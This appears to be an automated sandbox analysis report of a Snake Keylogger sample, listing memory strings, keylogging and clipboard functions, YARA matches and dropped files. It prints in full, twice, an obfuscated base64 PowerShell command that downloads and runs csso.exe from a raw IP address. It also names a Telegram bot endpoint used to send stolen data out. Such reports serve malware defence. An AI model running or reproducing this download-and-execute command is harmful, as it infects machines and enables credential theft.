Source: RegSvcs.exe, 0000000D.00000002.2442267821.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 0000000D.00000002.2442267821.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1335820890.0000000005401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2442267821.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1335820890.0000000005401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: csso.exe, 0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000003.00000002.1337786129.0000000006468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1337786129.0000000006468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1337786129.0000000006468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1333675298.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/AppvClient/icrosoft.AppV.AppVClientPowerShell
Source: powershell.exe, 00000003.00000002.1337786129.0000000006468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: csso.exe, 0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/d

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 12.2.csso.exe.3cb0000.1.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

12_2_000D4164

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

12_2_000D4164

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

12_2_000D3F66

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

12_2_000C001C

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

12_2_000ECABC

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"			Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 12.2.csso.exe.3cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.csso.exe.3cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.csso.exe.3cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.csso.exe.3cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: csso.exe PID: 7504, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: This is a third-party compiled AutoIt script.	12_2_00063B3A
Source: csso.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: csso.exe, 0000000C.00000000.1304574061.0000000000114000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a06aa9c9-c
Source: csso.exe, 0000000C.00000000.1304574061.0000000000114000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b9403683-9
Source: csso.exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b99747cd-f
Source: csso.exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f0921e09-8
Source: csso[1].exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e2f2c423-a
Source: csso[1].exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_abe27fab-6

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\csso.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000CA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

12_2_000CA1EF

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000B8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

12_2_000B8310

Source: C:\Users\user\AppData\Roaming\csso.exe

Code function: 12_2_000C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

12_2_000C51BD

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0008D975	12_2_0008D975
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000821C5	12_2_000821C5
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000962D2	12_2_000962D2
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000E03DA	12_2_000E03DA
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0009242E	12_2_0009242E
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000825FA	12_2_000825FA
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000BE616	12_2_000BE616
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0006E6A0	12_2_0006E6A0
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000766E1	12_2_000766E1
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0009878F	12_2_0009878F
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00078808	12_2_00078808
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00096844	12_2_00096844
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000E0857	12_2_000E0857
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000C8889	12_2_000C8889
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0008CB21	12_2_0008CB21
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00096DB6	12_2_00096DB6
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00076F9E	12_2_00076F9E
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00073030	12_2_00073030
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00083187	12_2_00083187
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0008F1D9	12_2_0008F1D9
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00061287	12_2_00061287
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00081484	12_2_00081484
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00075520	12_2_00075520
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00087696	12_2_00087696
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00075760	12_2_00075760
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00081978	12_2_00081978
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00099AB5	12_2_00099AB5
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0006FCE0	12_2_0006FCE0
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00081D90	12_2_00081D90
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0008BDA6	12_2_0008BDA6
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000E7DDB	12_2_000E7DDB
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0006DF00	12_2_0006DF00
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00073FE0	12_2_00073FE0
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_01433910	12_2_01433910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B80B0	13_2_012B80B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BC5CC	13_2_012BC5CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B54B8	13_2_012B54B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BCCF8	13_2_012BCCF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B80AC	13_2_012B80AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B54AF	13_2_012B54AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B27B9	13_2_012B27B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B2DDD	13_2_012B2DDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BBC28	13_2_012BBC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BBC26	13_2_012BBC26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BCCF1	13_2_012BCCF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D16998	13_2_01D16998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D17198	13_2_01D17198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D115F8	13_2_01D115F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D14500	13_2_01D14500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D11C58	13_2_01D11C58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D17770	13_2_01D17770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1F1D6	13_2_01D1F1D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1F1D8	13_2_01D1F1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1119B	13_2_01D1119B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1C988	13_2_01D1C988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D111A0	13_2_01D111A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1C97C	13_2_01D1C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1E926	13_2_01D1E926
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1E928	13_2_01D1E928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1C0D8	13_2_01D1C0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1C0CF	13_2_01D1C0CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D108F0	13_2_01D108F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D108E0	13_2_01D108E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D140A6	13_2_01D140A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D140A8	13_2_01D140A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D10040	13_2_01D10040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1E076	13_2_01D1E076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1E078	13_2_01D1E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1B818	13_2_01D1B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1003C	13_2_01D1003C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1B828	13_2_01D1B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1B3D0	13_2_01D1B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1B3C1	13_2_01D1B3C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1339E	13_2_01D1339E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D133A0	13_2_01D133A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D11B4A	13_2_01D11B4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1AB1E	13_2_01D1AB1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1AB20	13_2_01D1AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D12AF0	13_2_01D12AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D12AE9	13_2_01D12AE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1FA88	13_2_01D1FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1A270	13_2_01D1A270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1FA79	13_2_01D1FA79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1A261	13_2_01D1A261
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1D234	13_2_01D1D234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1D238	13_2_01D1D238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1CDD0	13_2_01D1CDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1CDE0	13_2_01D1CDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D115E9	13_2_01D115E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1ED80	13_2_01D1ED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D10D48	13_2_01D10D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1ED70	13_2_01D1ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1C530	13_2_01D1C530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D10D38	13_2_01D10D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1E4D0	13_2_01D1E4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1E4C0	13_2_01D1E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D10498	13_2_01D10498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1BC80	13_2_01D1BC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1048B	13_2_01D1048B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D13C50	13_2_01D13C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D13C4E	13_2_01D13C4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1BC79	13_2_01D1BC79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1DC11	13_2_01D1DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1DC20	13_2_01D1DC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D137F8	13_2_01D137F8
